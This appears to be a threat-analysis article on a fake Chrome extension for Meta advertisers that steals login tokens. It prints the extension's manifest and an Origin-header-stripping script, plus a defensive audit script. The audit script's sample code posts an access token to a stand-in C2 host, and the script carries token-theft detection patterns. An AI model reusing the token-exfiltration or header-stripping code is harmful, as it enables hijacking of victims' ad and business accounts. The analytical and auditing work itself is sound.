A novel malicious Chrome extension has been uncovered targeting digital marketers by masquerading as a productivity tool for Meta ad campaigns.
Dubbed “Madgicx Plus,” this extension is distributed through a network of deceptive websites posing as legitimate AI-driven advertising platforms.
Rather than optimizing ad performance, the extension leverages powerful browser permissions to hijack user sessions and exfiltrate login tokens for Facebook and Instagram.
The campaign’s operators have repurposed infrastructure from previous malicious extensions, demonstrating an evolving threat that adapts social engineering lures to current digital marketing trends.
The extension’s distribution channels deploy professionally crafted domains—such as privacy-shield.world and madgicxads.world—that mimic real analytics and optimization services.
Visitors are encouraged to install the extension under the pretense of boosting campaign ROI, only to grant it full host access and network request interception capabilities.
Cybereason analysts noted that once installed, the extension injects content scripts into every visited page, enabling real-time harvesting of form inputs and session cookies.
This level of access allows attackers to bypass content security policies and interact directly with Meta’s internal APIs.
Impact assessments reveal that compromised credentials can lead to unauthorized modifications of advertising budgets, creation of new campaigns, and full takeover of business accounts.
Small and medium enterprises, often lacking dedicated security teams, are at particularly high risk as they routinely delegate ad management to third-party tools.
The ease with which the extension strips the HTTP Origin header from outbound requests further illustrates its capacity for seamless man-in-the-browser attacks.
Victims may remain unaware until they observe unexplained billing charges or missing campaigns in their Meta Business Manager dashboards.
Under the guise of a legitimate tool, the extension’s manifest.json grants host_permissions for “” and leverages declarativeNetRequest rules to remove origin headers from any request matching the pattern “caller=ext.”
This capability, combined with background scripts that forward stolen tokens to a command-and-control server, underpins a sophisticated data theft framework.
The real IP addresses behind the Cloudflare proxies were identified through favicon hash analysis and Shodan queries, leading to infrastructure owned by VDSina—an ISP previously linked to hosting malicious resources.
Infection Mechanism
Upon installation, the extension’s manifest triggers automatic injection of a background script that monitors browser navigation events.
The snippet below illustrates the permissions the extension requests in order to intercept form submissions and capture authentication tokens:

manifest.json excerpt:

```json
{
  "host_permissions": [""],
  "permissions": ["declarativeNetRequest", "declarativeNetRequestWithHostAccess"],
  "content_scripts": [
    {
      "matches": ["*://*/*"],
      "js": ["background.iife.js"]
    }
  ]
}
```
The core of the attack resides in background.iife.js, which establishes listeners for XHR requests to Facebook’s OAuth endpoints.
When the user logs in, the script extracts the “access_token” from the JSON response and stores it in local storage before relaying it to the malicious C2 domain at madgicx-plus.com.
By stripping the Origin header with a declarativeNetRequest rule, the extension evades same-origin checks and seamlessly integrates stolen tokens into attacker-controlled sessions:

```javascript
// background.iife.js snippet
// Note: a blocking webRequest listener needs the webRequestBlocking permission,
// which the manifest excerpt above does not declare; the article attributes the
// same header removal to a declarativeNetRequest rule.
chrome.webRequest.onBeforeSendHeaders.addListener(
  details => {
    // Drop the Origin header from every request bound for facebook.com
    details.requestHeaders = details.requestHeaders.filter(h => h.name !== 'Origin');
    return { requestHeaders: details.requestHeaders };
  },
  { urls: ["*://*.facebook.com/*"] },
  ["blocking", "requestHeaders"]
);
```
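The manifest permissions above and the Origin-stripping rule together form a recognisable pattern that an extension audit (the mitigation recommended below) can catch statically. The following Node.js script is an added example written for this article, not code from the article, Cybereason or the extension: it inspects an unpacked extension's manifest, its declarativeNetRequest rules and its bundled scripts, and flags broad host access, content scripts on every site, rules that tamper with sensitive request headers, and scripts that handle token-like values while sending data to hosts the reviewer has not approved. All sample data (manifest, rule set, script text, the `c2.example` host and the `allowedHosts` list) is constructed; the function and rule names are the example's own.

```javascript
'use strict';

// Constructed sample modelled on the article's description of the extension.
const SAMPLE_EXTENSION = {
  manifest: {
    manifest_version: 3,
    name: 'Sample Ads Helper (constructed)',
    host_permissions: ['<all_urls>'],
    permissions: ['declarativeNetRequest', 'declarativeNetRequestWithHostAccess'],
    content_scripts: [{ matches: ['*://*/*'], js: ['background.iife.js'] }],
  },
  // rules.json content: remove Origin on requests whose URL contains "caller=ext"
  rules: [{
    id: 1,
    priority: 1,
    action: { type: 'modifyHeaders', requestHeaders: [{ header: 'Origin', operation: 'remove' }] },
    condition: { urlFilter: 'caller=ext', resourceTypes: ['xmlhttprequest'] },
  }],
  // Constructed stand-in for the bundled script text (not the real file).
  scripts: {
    'background.iife.js':
      "const t = JSON.parse(body).access_token; localStorage.setItem('tk', t);\n" +
      "fetch('https://c2.example/collect', { method: 'POST', body: t });",
  },
  // Hosts the reviewer expects a Meta ads tool to talk to (constructed).
  allowedHosts: ['graph.facebook.com'],
};

// Constructed benign comparison: one API host, no content scripts, no rules.
const BENIGN_EXTENSION = {
  manifest: { manifest_version: 3, host_permissions: ['https://graph.facebook.com/*'], permissions: [] },
};

const BROAD_MATCH = /^(<all_urls>|\*:\/\/\*\/\*|https?:\/\/\*\/\*)$/;
const SENSITIVE_HEADERS = new Set(['origin', 'cookie', 'referer', 'authorization']);
const TOKEN_WORDS = /access_token|c_user|\bxs=|session|cookie/i;
const SEND_CALLS = /\b(fetch|XMLHttpRequest|sendBeacon|WebSocket)\b/;
const URL_RE = /https?:\/\/([a-z0-9.-]+)/gi;

// Broad host permissions and content scripts injected into every page.
function manifestFindings(manifest) {
  const out = [];
  for (const p of manifest.host_permissions || []) {
    if (BROAD_MATCH.test(p)) out.push({ severity: 'high', rule: 'broad-host-permission', detail: p });
  }
  for (const cs of manifest.content_scripts || []) {
    if ((cs.matches || []).some(m => BROAD_MATCH.test(m))) {
      out.push({ severity: 'high', rule: 'content-script-all-sites', detail: (cs.js || []).join(',') });
    }
  }
  if ((manifest.permissions || []).includes('declarativeNetRequestWithHostAccess')) {
    out.push({ severity: 'medium', rule: 'dnr-with-host-access', detail: 'can rewrite headers on permitted hosts' });
  }
  return out;
}

// declarativeNetRequest rules that remove or overwrite security-relevant headers.
function dnrFindings(rules) {
  const out = [];
  for (const r of rules) {
    if (!r.action || r.action.type !== 'modifyHeaders') continue;
    for (const h of r.action.requestHeaders || []) {
      if (SENSITIVE_HEADERS.has(String(h.header).toLowerCase())) {
        const where = (r.condition && r.condition.urlFilter) || '*';
        out.push({ severity: 'high', rule: 'dnr-header-tamper', detail: `rule ${r.id} ${h.operation}s ${h.header} on ${where}` });
      }
    }
  }
  return out;
}

// Scripts that send data to hosts outside the approved list, or that touch
// token-like values and also contain a network send.
function scriptFindings(scripts, allowedHosts) {
  const out = [];
  const allowed = new Set(allowedHosts.map(h => h.toLowerCase()));
  for (const [name, src] of Object.entries(scripts)) {
    const hosts = new Set([...src.matchAll(URL_RE)].map(m => m[1].toLowerCase()));
    const external = [...hosts].filter(h => !allowed.has(h));
    const sends = SEND_CALLS.test(src);
    if (external.length && sends) out.push({ severity: 'high', rule: 'undeclared-egress', detail: `${name} -> ${external.join(',')}` });
    if (TOKEN_WORDS.test(src) && sends) out.push({ severity: 'medium', rule: 'token-handling-with-egress', detail: name });
  }
  return out;
}

function auditExtension({ manifest, rules = [], scripts = {}, allowedHosts = [] }) {
  return [...manifestFindings(manifest), ...dnrFindings(rules), ...scriptFindings(scripts, allowedHosts)];
}

// Two or more high-severity findings: block install; anything else found: review.
function verdict(findings) {
  const high = findings.filter(f => f.severity === 'high').length;
  if (high >= 2) return 'block';
  return findings.length ? 'review' : 'allow';
}

for (const ext of [SAMPLE_EXTENSION, BENIGN_EXTENSION]) {
  const findings = auditExtension(ext);
  console.log(verdict(findings), findings);
}
```

Run it with `node audit.js` against the unpacked extension directory's parsed `manifest.json`, the rule set referenced by `declarative_net_request.rule_resources`, and the script files read into the `scripts` map. The constructed sample yields four high-severity findings (broad host permission, content script on all sites, Origin removal, undeclared egress) and a `block` verdict; the benign comparison yields none.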
Through these mechanisms, attackers gain persistent access to the victim’s Meta environment without triggering standard browser alerts.
The extension’s combination of broad permissions, CSP bypass techniques, and covert token exfiltration marks a significant escalation in browser-based threats against social media advertisers.
Security teams should prioritize extension audits, restrict unnecessary permissions, and isolate advertising workflows to dedicated profiles to mitigate such risks.